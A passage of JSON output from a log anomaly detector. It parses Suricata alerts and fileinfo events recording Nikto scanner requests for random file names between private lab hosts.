"\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1023417676108868, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80", "/parser/model/time": 1583349514.171543, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46786, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.aspx", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.171725, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":921236109171523,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46786, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":921236109171523,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 921236109171523, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80", "/parser/model/time": 1583349514.17346, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46788, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.c", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.173752, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46788, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1561375214838397, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80", "/parser/model/time": 1583349514.175341, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46790, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.175637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, 